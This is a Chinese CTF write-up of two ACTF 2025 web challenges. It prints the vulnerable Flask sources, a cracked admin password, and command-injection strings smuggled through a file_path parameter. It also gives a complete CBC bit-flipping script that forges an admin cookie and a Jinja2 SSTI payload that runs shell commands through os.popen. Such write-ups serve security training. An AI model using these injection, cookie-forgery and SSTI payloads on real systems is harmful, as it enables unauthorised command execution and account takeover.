2025ACTF|WEB

前言：

只能说不亏是XCTF的选拔赛，难的一批。当时打了一天的比赛，晚上抽空看了一下题，就整出来一题唉。。。

ACTF upload

描述：无

考点：文件包含、密码爆破、无回显RCE

进入后一个登录界面直接随便用一个用户都能登录

进入一个文件上传随机上传一个木马文件，但是发现虽然上传成功了但是没法连接

发现有一个文件包含

查看源代码后base64解密

尝试读取index.php和index.html无果后尝试读取app.py发现真读到了

得到源码

import uuid
import os
import hashlib
import base64
from flask import Flask, request, redirect, url_for, flash, session

app = Flask(__name__)
app.secret_key = os.getenv('SECRET_KEY')

@app.route('/')
def index():
    if session.get('username'):
        return redirect(url_for('upload'))
    else:
        return redirect(url_for('login'))

@app.route('/login', methods=['POST', 'GET'])
def login():
    if request.method == 'POST':
        username = request.form['username']
        password = request.form['password']
        if username == 'admin':
            if hashlib.sha256(password.encode()).hexdigest() == '32783cef30bc23d9549623aa48aa8556346d78bd3ca604f277d63d6e573e8ce0':
                session['username'] = username
                return redirect(url_for('index'))
            else:
                flash('Invalid password')
        else:
            session['username'] = username
            return redirect(url_for('index'))
    else:
        return '''
        <h1>Login</h1>
        <h2>No need to register.</h2>
        <form action="/login" method="post">
            <label for="username">Username:</label>
            <input type="text" id="username" name="username" required>
            <br>
            <label for="password">Password:</label>
            <input type="password" id="password" name="password" required>
            <br>
            <input type="submit" value="Login">
        </form>
        '''

@app.route('/upload', methods=['POST', 'GET'])
def upload():
    if not session.get('username'):
        return redirect(url_for('login'))
    
    if request.method == 'POST':
        f = request.files['file']
        file_path = str(uuid.uuid4()) + '_' + f.filename
        f.save('./uploads/' + file_path)
        return redirect(f'/upload?file_path={file_path}')
    
    else:
        if not request.args.get('file_path'):
            return '''
            <h1>Upload Image</h1>
            
            <form action="/upload" method="post" enctype="multipart/form-data">
                <input type="file" name="file">
                <input type="submit" value="Upload">
            </form>
            '''
            
        else:
            file_path = './uploads/' + request.args.get('file_path')
            if session.get('username') != 'admin':
                with open(file_path, 'rb') as f:
                    content = f.read()
                    b64 = base64.b64encode(content)
                    return f'<img src="data:image/png;base64,{b64.decode()}" alt="Uploaded Image">'
            else:
                os.system(f'base64 {file_path} > /tmp/{file_path}.b64')
                # with open(f'/tmp/{file_path}.b64', 'r') as f:
                #     return f'<img src="data:image/png;base64,{f.read()}" alt="Uploaded Image">'
                return 'Sorry, but you are not allowed to view this image.'
                
if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)

找到关键点

但是前提需要用admin用户登录，前面其实我们登录的是admin’#

用hashcat爆破一下密码

爆出密码backdoor，返回登录界面登录admin用户

;ls />./uploads/1.txt;伪造文件名执行命令并且写入uploads目录里

重新登录普通用户读取1.txt

访问/upload?file_path=1.txt

接下来一样的操作获取flag就行

/upload?file_path=;tac /Fl4g_is_H3r3>./uploads/flag.txt;
/upload?file_path=flag.txt

not so web 1

描述：Web不够，其他来凑

考点：CBC字节翻转攻击、SSTI

注册admin用户显示已存在

但是尝试爆破发现爆破不出来，注册个普通用户先登录看看

进入后就只有一段base64编码的字符串，解码后得到源码

import base64, json, time
import os, sys, binascii
from dataclasses import dataclass, asdict
from typing import Dict, Tuple
from secret import KEY, ADMIN_PASSWORD
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
from flask import (
    Flask,
    render_template,
    render_template_string,
    request,
    redirect,
    url_for,
    flash,
    session,
)

app = Flask(__name__)
app.secret_key = KEY


@dataclass(kw_only=True)
class APPUser:
    name: str
    password_raw: str
    register_time: int


#  In-memory store for user registration
users: Dict[str, APPUser] = {
    "admin": APPUser(name="admin", password_raw=ADMIN_PASSWORD, register_time=-1)
}


def validate_cookie(cookie: str) -> bool:
    if not cookie:
        return False

    try:
        cookie_encrypted = base64.b64decode(cookie, validate=True)
    except binascii.Error:
        return False

    if len(cookie_encrypted) < 32:
        return False

    try:
        iv, padded = cookie_encrypted[:16], cookie_encrypted[16:]
        cipher = AES.new(KEY, AES.MODE_CBC, iv)
        cookie_json = cipher.decrypt(padded)
    except ValueError:
        return False

    try:
        _ = json.loads(cookie_json)
    except Exception:
        return False

    return True


def parse_cookie(cookie: str) -> Tuple[bool, str]:
    if not cookie:
        return False, ""

    try:
        cookie_encrypted = base64.b64decode(cookie, validate=True)
    except binascii.Error:
        return False, ""

    if len(cookie_encrypted) < 32:
        return False, ""

    try:
        iv, padded = cookie_encrypted[:16], cookie_encrypted[16:]
        cipher = AES.new(KEY, AES.MODE_CBC, iv)
        decrypted = cipher.decrypt(padded)
        cookie_json_bytes = unpad(decrypted, 16)
        cookie_json = cookie_json_bytes.decode()
    except ValueError:
        return False, ""

    try:
        cookie_dict = json.loads(cookie_json)
    except Exception:
        return False, ""

    return True, cookie_dict.get("name")


def generate_cookie(user: APPUser) -> str:
    cookie_dict = asdict(user)
    cookie_json = json.dumps(cookie_dict)
    cookie_json_bytes = cookie_json.encode()
    iv = os.urandom(16)
    padded = pad(cookie_json_bytes, 16)
    cipher = AES.new(KEY, AES.MODE_CBC, iv)
    encrypted = cipher.encrypt(padded)
    return base64.b64encode(iv + encrypted).decode()


@app.route("/")
def index():
    if validate_cookie(request.cookies.get("jwbcookie")):
        return redirect(url_for("home"))
    return redirect(url_for("login"))


@app.route("/register", methods=["GET", "POST"])
def register():
    if request.method == "POST":
        user_name = request.form["username"]
        password = request.form["password"]
        if user_name in users:
            flash("Username already exists!", "danger")
        else:
            users[user_name] = APPUser(
                name=user_name, password_raw=password, register_time=int(time.time())
            )
            flash("Registration successful! Please login.", "success")
            return redirect(url_for("login"))
    return render_template("register.html")


@app.route("/login", methods=["GET", "POST"])
def login():
    if request.method == "POST":
        username = request.form["username"]
        password = request.form["password"]
        if username in users and users[username].password_raw == password:
            resp = redirect(url_for("home"))
            resp.set_cookie("jwbcookie", generate_cookie(users[username]))
            return resp
        else:
            flash("Invalid credentials. Please try again.", "danger")
    return render_template("login.html")


@app.route("/home")
def home():
    valid, current_username = parse_cookie(request.cookies.get("jwbcookie"))
    if not valid or not current_username:
        return redirect(url_for("logout"))

    user_profile = users.get(current_username)
    if not user_profile:
        return redirect(url_for("logout"))

    if current_username == "admin":
        payload = request.args.get("payload")
        html_template = """
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Home</title>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <link rel="stylesheet" href="{{ url_for('static', filename='styles.css') }}">
</head>
<body>
    <div class="container">
        <h2 class="text-center">Welcome, %s !</h2>
        <div class="text-center">
            Your payload: %s
        </div>
        <img src="{{ url_for('static', filename='interesting.jpeg') }}" alt="Embedded Image">
        <div class="text-center">
            <a href="/logout" class="btn btn-danger">Logout</a>
        </div>
    </div>
</body>
</html>
""" % (
            current_username,
            payload,
        )
    else:
        html_template = (
            """
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Home</title>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <link rel="stylesheet" href="{{ url_for('static', filename='styles.css') }}">
</head>
<body>
    <div class="container">
        <h2 class="text-center">server code (encoded)</h2>
        <div class="text-center" style="word-break:break-all;">
        {%% raw %%}
            %s
        {%% endraw %%}
        </div>
        <div class="text-center">
            <a href="/logout" class="btn btn-danger">Logout</a>
        </div>
    </div>
</body>
</html>
"""
            % base64.b64encode(open(__file__, "rb").read()).decode()
        )
    return render_template_string(html_template)


@app.route("/logout")
def logout():
    resp = redirect(url_for("login"))
    resp.delete_cookie("jwbcookie")
    return resp


if __name__ == "__main__":
    app.run()

直接看代码的关键点

用户为 admin 时，/home路由存在SSTI，可直接通过 payload 参数实现RCE

所以现在首要的就是伪造admin用户登录

通过审计代码可以知道当前是用cookie来识别用户的，查看一下cookie生成的逻辑

主要其实就是要得到key，但是我试了半天也没有办法爆出key，后面想到可以直接将cookie中的用户篡改为admin，直接上脚本

但是当时尝试的就是直接用CBC字节翻转攻击，然后直接将Cookie里的用户ddmin替换为admin，但是当时写的那个脚本没成功，这里也是直接上网上找的exp了

import base64


# CBC反转攻击函数（针对Base64编码的Cookie）
def cbc_bit_flip_base64(cookie_base64, original_plaintext, target_value, target_start_pos, target_len, block_size=16):
    """
    执行CBC反转攻击，修改Base64编码的Cookie（IV || Ciphertext）
    :param cookie_base64: Base64编码的Cookie（字符串）
    :param original_plaintext: 原始明文（字节串）
    :param target_value: 目标字段值（字节串）
    :param target_start_pos: 目标字段在明文中的起始位置
    :param target_len: 目标字段长度
    :param block_size: 块大小（默认16字节）
    :return: 修改后的Base64编码Cookie
    """
    # 解码Base64
    cookie_bytes = base64.b64decode(cookie_base64)
    if len(cookie_bytes) < block_size:
        raise ValueError("Cookie too SMALL, expected at least one block (IV)")

    # 提取IV和密文
    iv = cookie_bytes[:block_size]
    ciphertext = cookie_bytes[block_size:]

    # 计算目标字段所在的块
    block_index = target_start_pos // block_size
    offset_in_block = target_start_pos % block_size

    # 确保目标值长度匹配
    if len(target_value) != target_len:
        raise ValueError("Target value length does not match the specified length")

    # 验证块索引（目标应在第0块，通过IV修改）
    if block_index != 0:
        raise ValueError("Target field is not in the first block; adjust the attack logic")

    # 提取原始明文对应位置的字段
    original_field = original_plaintext[target_start_pos:target_start_pos + target_len]

    # 修改IV
    # P_0 = D_K(C_0) ^ IV => P_0' = D_K(C_0) ^ IV' => IV' = IV ^ P_0 ^ P_0'
    new_iv = bytearray(iv)
    for i in range(target_len):
        if offset_in_block + i < block_size:
            new_iv[offset_in_block + i] = (
                    iv[offset_in_block + i] ^ original_field[i] ^ target_value[i]
            )

    # 拼接修改后的IV和原密文
    modified_cookie_bytes = bytes(new_iv) + ciphertext

    # 编码为Base64
    modified_cookie_base64 = base64.b64encode(modified_cookie_bytes).decode('utf-8')

    return modified_cookie_base64


# 示例
def main():
    # 输入的Base64 Cookie
    cookie_base64 = "0slJTJR8L1NKM3jiLlTCFbshlQizPVlRW9auQUW93128rDhF9Bs+2/Iijr3EUBFzEM/XslFHwHC3OdD0apCgYXEWKtsXkCC+cmBYd2CZ7EXo41AAfsCflNiCc4Ee79Fd"
    print(f"Original Cookie (Base64): {cookie_base64}")

    # 原始明文
    original_plaintext = b'{"name": "ddmin", "password_raw": "123", "register_time": 1745673597}'
    print(f"Original Plaintext: {original_plaintext.decode()}")

    # 目标值：将"ddmin"改为"admin"
    target_value = b"admin"
    target_start_pos = original_plaintext.index(b"ddmin")  # "ddmin"在明文中的起始位置
    target_len = len(b"ddmin")  # 字段长度

    # 执行CBC反转攻击
    modified_cookie_base64 = cbc_bit_flip_base64(
        cookie_base64, original_plaintext, target_value, target_start_pos, target_len
    )
    print(f"Modified Cookie (Base64): {modified_cookie_base64}")

if __name__ == "__main__":
    main()

进入后台后按上面分析的打SSTI就行了

/home?payload={{config.__class__.__init__.__globals__['os'].popen('cat+flag.txt').read()}}